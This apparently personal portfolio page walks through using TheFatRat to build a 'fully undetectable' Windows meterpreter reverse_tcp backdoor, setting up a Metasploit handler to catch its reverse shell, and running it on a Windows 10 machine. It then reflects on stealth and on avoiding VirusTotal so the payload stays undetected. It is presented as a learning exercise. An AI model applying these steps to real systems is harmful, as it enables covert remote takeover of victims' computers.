top of page

Fat-Rat Github payload generator walkthrough


Welcome to my project, an exploration into the capabilities and implications of the FatRat Github payload generator. As a security enthusiast and practitioner, I've embarked on this journey to delve deeper into the realm of cybersecurity tools, understanding their functionalities, and dissecting their potential applications. Join me as I navigate through the process of leveraging FatRat for creating backdoors and exploring the nuances of payload generation.

This is a paragraph where you can add any information you want to share with website visitors. Click here to edit the text, change the font and make it your own.



1.    Github clone
2.    Cd TheFatRat
3.    Chmod +x &&
4.    Sudo su root
5.    Run fatrat (this will start the tool)


6.    It will warn us not to upload to virus total (so we will not)

7.    We will create a backdoor with option 6


8.    We will use option 2 create exe file C# and Powershell this is FUD (fully undetectable)


9.    Set LHOST [HOST IP]



10.    SET LPORT 5555


11. Enter the basename of out put file I named mine ratbackdoor

12.We then use option 3 windows/meterpreter/reverse_tcp

13. Backdoor is then created and is in /root/Fatrat_Generated/ratbackdoor.exe

14.This tool doesn't open a listener so we may have to open a second or go back to main menu and use option 10


15.    Open another terminal cd /root/Fatrat_Generated


16.    Cp ratbackdoor.exe /home/kali/Desktop


17.    Then copy exe  to windows 10 device

18.    We will then use command use  exploit/multi/handler/

19.    Set payload windows/meterpreter/reverse_tcp

20.    Set LHOST

21.    Set LPORT 5555

22.    Run

23.    Then click on our backdoor in windows 10 machine.

 Lessons Learned

  1. Tool Familiarization: The initial step was to clone the FatRat repository from Github and navigate to its directory. This acquainted me with the structure of the tool and its setup process.

  2. Execution Permissions: Understanding the importance of proper permissions, I ensured that the setup script was executable using the chmod command before running it.

  3. Root Privileges: As certain functionalities of FatRat require elevated privileges, I transitioned to root using sudo su root to execute the tool seamlessly.

  4. Payload Generation: The core functionality of FatRat lies in its ability to generate various types of payloads. By selecting options within the tool, I learned to create backdoors tailored to specific scenarios.

  5. Undetectable Payloads: Exploring the options provided by FatRat, I discovered techniques to generate Fully Undetectable (FUD) payloads using C# and Powershell scripts, enhancing the stealth and effectiveness of the backdoors.

  6. Payload Customization: Through setting parameters such as LHOST and LPORT, I gained insights into customizing payloads to suit different network configurations and operational requirements.

  7. Listener Management: Recognizing the need to manage listeners for incoming connections, I became adept at initiating listeners either within the tool or separately using commands.

  8. Deployment Strategies: After generating the backdoor executable, I experimented with different deployment strategies, including transferring the payload to target machines and initiating connections from the attacker's end.

  9. Operational Considerations: The process highlighted the importance of operational considerations such as managing multiple terminals, file transfers, and ensuring seamless communication between attacker and target systems.

  10. Security Awareness: Finally, the experience underscored the significance of security awareness, including cautionary measures such as refraining from uploading payloads to public repositories like VirusTotal to avoid detection.

In conclusion, my journey through the FatRat payload generator not only enhanced my technical skills but also deepened my understanding of cybersecurity methodologies and the intricate dance between attackers and defenders in the digital landscape. Through this project, I aim to share my insights and contribute to the collective knowledge of the cybersecurity community.

bottom of page